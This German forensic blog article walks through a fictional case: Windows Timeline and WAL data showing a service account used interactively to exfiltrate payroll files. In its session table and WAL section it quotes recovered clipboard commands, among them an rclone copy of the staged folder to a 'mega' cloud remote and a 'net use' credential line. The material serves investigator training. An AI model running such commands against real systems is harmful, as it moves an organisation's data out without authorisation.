Skip to content

Windows-Timeline-Ermittlung: ein Exfiltrationsfall

Fiktiver Fall Schritt für Schritt: interaktive Sitzung eines Dienstkontos und Exfiltration von Gehaltsdaten aus ActivitiesCache.db und WAL rekonstruieren.

Veröffentlicht am 6 Min. Lesezeit

Kurz gesagt. In diesem fiktiven Fall zeigt die Timeline des Kontos svc_backup auf dem Arbeitsplatz FIN-WKS-07 ein aus Downloads geöffnetes Werkzeugarchiv, eine in Notepad gelesene Datei mit Zugangsdaten, einen net use-Befehl in der Zwischenablage, eine RDP-Sitzung, eine durchsuchte Gehaltsfreigabe, eine aus E:\exfil geöffnete Excel-Datei, fünf Minuten Fokus in rclone.exe aus C:\Users\Public, einen Befehl rclone copy ... mega: in der Zwischenablage und eine anstehende Löschung des Notepad-Eintrags. Die letzten fünf Punkte existieren nur im WAL.

Hinweis: fiktives Szenario. Alles Folgende ist erfunden: Organisation, Rechner, Konto, Dateien und Uhrzeiten. Es entspricht der Datenbank hinter „Beispiel testen“ auf der Startseite des Windows Timeline Parser, sodass Sie mit denselben Zeilen mitverfolgen können. Die Geschichte setzt den svc_backup-Angriff fort, der auf allen Websites dieser Parser-Familie verwendet wird.

Der Anruf

Montag, 14. September 2026, am Nachmittag. Der Dateiserver der Finanzabteilung, FILESRV01, zeigt am späten Vormittag einen ungewöhnlichen Lesezugriffs-Ausschlag auf \\FILESRV01\Finance\Payroll. Verantwortlich ist das Konto svc_backup, ein Dienstkonto, das sich nie interaktiv anmelden sollte. Der einzige Arbeitsplatz, auf dem es ein Profil hat, ist FIN-WKS-07. Der Rechner läuft noch.

Der Ermittler startet eine Triage-Sammlung mit dem KAPE-Target WindowsTimeline, sodass C:\Users\svc_backup\AppData\Local\ConnectedDevicesPlatform\L.svc_backup\ mit ActivitiesCache.db und ActivitiesCache.db-wal zurückkommt (Sicherungsleitfaden).

Die erste Frage: Hat ein Mensch dieses Konto an der Tastatur benutzt, und was hat er getan?

Erster Durchgang: laden und Zähler lesen

Legt man die ZIP der Sammlung im Werkzeug ab, paart es die Datenbank mit ihrem WAL und ordnet sie über den Pfad Users\svc_backup\ dem Konto svc_backup zu. Keine Warnungen: Das WAL passt, alle Frames sind bestätigt.

Die Zähler sind der erste Befund. Es gibt Aktivitäten aller interessanten Typen, Zwischenablage-Einträge und eine Löschung. Mehrere Zeilen sind als Nur im WAL markiert: Sie wurden nach dem letzten Checkpoint geschrieben. Hätte der Ermittler nur die Datenbank gesichert, gäbe es diese Zeilen nicht.

Die Sitzung, Zeile für Zeile

Die Zeiten sind UTC. Der userTimezone im Payload ist Europe/Paris (an diesem Datum UTC+2), die Uhr des Benutzers zeigte also zwei Stunden mehr.

UTCTypAppElementMarkierungen
10:02 bis 10:08In Verwendung (360 s)%SystemRoot%\System32\cmd.exe
10:06:40Geöffnet%ProgramFiles%\7-Zip\7zFM.exeC:\Users\svc_backup\Downloads\tools.zipVom Benutzer beschreibbarer Ordner
10:10:05GeöffnetNotepadC:\ProgramData\Intel\creds.txtVom Benutzer beschreibbarer Ordner
10:10:05 bis 10:14:05In Verwendung (240 s)Notepad
10:12:30ZwischenablageNotepadnet use \\FILESRV01\Finance /user:CORP\svc_backupZwischenablage
10:18:40 bis 10:30In Verwendung (680 s)mstsc.exe
10:31:07GeöffnetFile Explorer\\FILESRV01\Finance\PayrollNetzwerkpfad
10:31:07 bis 10:44In Verwendung (770 s)File ExplorerIm WAL geändert
10:40:12GeöffnetExcelE:\exfil\finance_2026\Payroll_2026.xlsxAnderes Laufwerk, Nur im WAL
10:47:02Zwischenablagecmd.exerclone copy E:\exfil mega:fin-backup --transfers 8Zwischenablage, Nur im WAL
10:47:12 bis 10:52:30In Verwendung (318 s)C:\Users\Public\rclone.exeVom Benutzer beschreibbarer Ordner, Nur im WAL
10:55:20Operation: LöschenNotepad(die Aktivität zu creds.txt)Löschung, Nur im WAL

Gelesen so, wie es der Artikel zum Ausführungsnachweis empfiehlt:

Ein Mensch saß an der Tastatur. Fokuszeit in cmd.exe, Notepad, mstsc.exe, im Explorer und in rclone.exe ist interaktive Nutzung, keine geplante Aufgabe. Ein Dienstkonto mit zwanzig Minuten Vordergrundaktivität ist schon für sich ein Befund.

Die Werkzeuge kamen als Archiv. tools.zip im Downloads-Ordner des Kontos, vier Minuten nach Sitzungsbeginn mit 7-Zip geöffnet. Nächster Schritt: USN-Journal und Prefetch, um zu sehen, was daraus hervorging.

Zugangsdaten wurden in einer Datei bereitgelegt. C:\ProgramData\Intel\creds.txt ist keine Intel-Datei. Vier Minuten Fokus in Notepad, und zwei Minuten später ein net use-Befehl mit dem Kontonamen in der Zwischenablage. Die Zwischenablage-Zeile ist Inhalt vom Typ 10, der nur existiert, weil Zwischenablageverlauf und Synchronisierung auf diesem Rechner eingeschaltet waren (Zwischenablage-Forensik).

Die Freigabe wurde durchsucht, länger als es zunächst aussah. Die Explorer-Fokussitzung im Ordner Payroll zeigt 350 Sekunden in der zurückgeschriebenen Datenbank und 770 Sekunden im WAL. Die Zeile wurde nach dem Checkpoint aktualisiert. Wer nur die Datenbank zitiert, halbiert die Zeit auf der Freigabe.

Was nur das WAL weiß

Alles nach 10:40 steht nur im WAL:

  • Excel öffnete Payroll_2026.xlsx aus E:\exfil\finance_2026\: einem zweiten, vermutlich wechselbaren Laufwerk. Timeline liefert den Buchstaben, nicht das Gerät. LNK-Dateien und Jump Lists von Excel enthalten Volume-Informationen; der USB-Verlauf steht in der Registry.
  • rclone.exe lief aus C:\Users\Public\, erfasst über eine AppId vom Typ x_exe_path (ein eigenständiges Programm, keine installierte App), mit 318 Sekunden Fokus.
  • Die Zwischenablage enthält den genauen Befehl: rclone copy E:\exfil mega:fin-backup --transfers 8. Er nennt Quellordner, Ziel (mega:, ein in der rclone-Konfiguration des Benutzers definierter Remote-Name, laut rclone-Dokumentation) und Parallelität.
  • Um 10:55:20 wurde eine Löschoperation für die Aktivität zu creds.txt vorgemerkt: Jemand hat diesen Eintrag aus seinem Aktivitätsverlauf entfernt (Anti-Forensik). Die ursprüngliche Activity-Zeile ist noch da, und die Operation selbst ist ein mit Zeitstempel versehener Beleg für den Bereinigungsversuch.

Ohne WAL endet der Bericht bei einem Explorer-Fenster auf einer Freigabe. Mit WAL enthält er den Ablageordner, das Werkzeug, den Befehl und die Bereinigung. Das ist die praktische Bedeutung von warum die -wal-Datei zählt.

Bestätigungsplan

Timeline liefert die Erzählung; jede Aussage braucht dennoch einen zweiten Zeugen.

AussageBelegen mit
rclone.exe wurde ausgeführtPrefetch RCLONE.EXE-*.pf, SHA-1 in AmCache
Daten sind abgeflossenNetzwerknutzung von rclone.exe in SRUM, Proxy- oder Firewall-Protokolle
E: war ein USB-GerätUSB-Schlüssel in SYSTEM über den Registry-Parser, Volume-Seriennummer in LNK
RDP zu welchem HostJump List von mstsc, Registry-Schlüssel des Terminal Server Client, Ereignisprotokolle auf dem Ziel
Inhalt von creds.txtDie Datei selbst oder ihre Spuren im Papierkorb und im USN-Journal
Anmeldetyp des KontosSecurity-Ereignisse 4624 in EVTX

Was Sie schreiben

Eine belastbare Zusammenfassung für den Bericht:

„Die Aktivitätsverlaufsdatenbank von svc_backup auf FIN-WKS-07 (ActivitiesCache.db mit Write-Ahead-Log, Hashwerte im Anhang) verzeichnet am 14. September 2026 zwischen 10:02 und 10:55 UTC eine interaktive Nutzung des Kontos, darunter das Öffnen von E:\exfil\finance_2026\Payroll_2026.xlsx durch Excel um 10:40:12, 318 Sekunden aktive Nutzung von C:\Users\Public\rclone.exe ab 10:47:12 sowie Zwischenablageinhalt, der zu einer rclone-Kopie auf einen Remote namens mega passt. Diese Datensätze existieren nur im Write-Ahead-Log. Um 10:55:20 wurde die Löschung der Aktivität zu C:\ProgramData\Intel\creds.txt vorgemerkt.“

Danach folgt die ausgefüllte Bestätigungstabelle.

Selbst ausprobieren

Öffnen Sie das Werkzeug, klicken Sie auf Beispiel testen und bilden Sie die Tabelle oben nach: Aktivieren Sie Nur markierte, achten Sie auf die Markierung Nur im WAL und stellen Sie dann den Typfilter auf Ausstehende Operationen. Die Schritt-für-Schritt-Anleitung erklärt jedes Bedienelement.

Verwandte Artikel

Wie Windows Text aus der Zwischenablage in ActivitiesCache.db speichert: Typen 10 und 16, nötige Einstellungen, Ablauf nach 12 Stunden und Base64-Dekodierung.
Was eine Windows-Timeline-Zeile wirklich belegt: geöffnete Datei, App im Fokus, Nutzungsdauer. Wie Sie es formulieren und welche Artefakte es bestätigen.
Fairer Vergleich von Windows-Timeline-Parsern: WxTCmd, Werkzeuge von kacos2000, Plaso, Velociraptor, SQL-Abfragen und dieser Browser-Parser, samt WAL-Handling.